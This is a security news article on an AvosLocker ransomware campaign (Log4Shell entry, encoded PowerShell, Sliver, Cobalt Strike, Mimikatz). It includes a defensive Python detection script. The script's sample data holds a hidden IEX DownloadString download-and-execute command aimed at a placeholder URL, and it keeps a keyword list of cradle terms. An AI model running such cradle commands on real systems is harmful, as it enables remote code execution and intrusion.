Cybersecurity researchers have monitored a month-long threat campaign operated by the AvosLocker group, which has expanded its arsenal and utilised several tools to aid its attacks.
The researchers said they observed AvosLocker operators searching for exposed networks to compromise. The adversaries used various tools, such as Sliver, the Cobalt Strike beacon, and several commercially available network scanners.
In this campaign, the attackers targeted an internet-exposed ESXi server after exploiting the critical Log4Shell flaw through the VMware Horizon Unified Access Gateway (UAG). During the initial stages of the attacks, the operators employed multiple strategies to obtain a foothold on the target’s network.
The researchers also discovered numerous other payloads and tools on endpoints, including LOLBins (living-off-the-land binaries).
The AvosLocker group utilised another set of tools from the initial intrusion of its attack onward.
The AvosLocker operators also used the WMI Provider Host on a Windows Server as the initial access point, executing an encoded PowerShell script. The group also used this approach together with the DownloadString method last February.
A couple of days later, the researchers detected an executable called “RuntimeBrokerService[.]exe” that created a file named watcher[.]exe. However, these files appear to be connected to a crypto-miner rather than to AvosLocker.
Several weeks later, another encoded PowerShell command was run through the DownloadString method. Subsequently, the threat actors executed more PowerShell scripts to download and run the Sliver malware. The scripts also downloaded the Cobalt Strike beacon and the Mimikatz payload.
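Two of the behaviours described above, an encoded PowerShell command launched under the WMI Provider Host and a DownloadString-style download cradle, are both visible in process-creation telemetry. The following script is an added example written for this article and is not the researchers' code: it decodes the base64/UTF-16LE payload behind `-EncodedCommand`, looks for download-cradle keywords in the decoded script, and raises an alert when several indicators coincide. The event format, the field names, the sample events and the placeholder URL are all constructed for the example.

```python
import base64
import re

# Helper to build an -EncodedCommand argument the way PowerShell expects it
# (UTF-16LE text, then base64). Used here only to construct sample events.
def encode_ps(cmd: str) -> str:
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

# Constructed sample process-creation events (hypothetical schema, not from
# the page): parent image plus the child's command line. The URL is a placeholder.
SAMPLE_EVENTS = [
    {"parent": "WmiPrvSE.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString("
                            "'http://placeholder.invalid/s.ps1')")},
    {"parent": "explorer.exe",
     "cmdline": "powershell.exe -EncodedCommand "
                + encode_ps("Get-Process | Out-File C:\\temp\\procs.txt")},
    {"parent": "cmd.exe",
     "cmdline": "powershell.exe -Command Get-Date"},
]

# PowerShell accepts abbreviated forms of -EncodedCommand; longest alternative first.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
                          re.IGNORECASE)
# Keywords typical of a download-and-execute cradle.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|Invoke-WebRequest",
    re.IGNORECASE)
# Parents that should rarely spawn PowerShell directly (WMI Provider Host, per the article).
SUSPICIOUS_PARENTS = {"wmiprvse.exe"}


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if absent or invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict) -> dict:
    """Decode the command line, collect indicators and decide whether to alert."""
    decoded = decode_encoded_command(event["cmdline"])
    script = decoded if decoded is not None else event["cmdline"]
    indicators = sorted({hit.lower() for hit in DOWNLOAD_CRADLE.findall(script)})
    reasons = []
    if decoded is not None:
        reasons.append("encoded_command")
    if indicators:
        reasons.append("download_cradle")
    if event["parent"].lower() in SUSPICIOUS_PARENTS:
        reasons.append("wmi_parent")
    # One indicator alone (e.g. a benign encoded admin script) is not enough;
    # two or more coinciding is what the campaign described above looks like.
    return {"decoded": decoded, "indicators": indicators,
            "reasons": reasons, "alert": len(reasons) >= 2}


def triage(events):
    """Score a batch of process-creation events."""
    return [score_event(e) for e in events]


if __name__ == "__main__":
    for event, result in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(event["parent"], result["alert"], result["reasons"])
```

Decoding the encoded command before matching is the key step: keyword rules applied to the raw command line see only base64 and miss the cradle entirely. The threshold of two coinciding reasons keeps a lone encoded administrative script from alerting while still catching the encoded, WMI-spawned download cradle the campaign relied on.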
The threat group also used the SoftPerfect Network Scanner, which was transferred via AnyDesk to another server, and PDQ Deploy, a software deployment kit, as legitimate tools during the threat campaign.
The AvosLocker ransomware group is expanding its arsenal with more malicious and legitimate tools. The latest campaign shows the importance of applying hotfixes, patches, and updates as soon as they are available. Cybersecurity experts advise users to employ a reliable and competent anti-malware solution that monitors client systems to stay protected.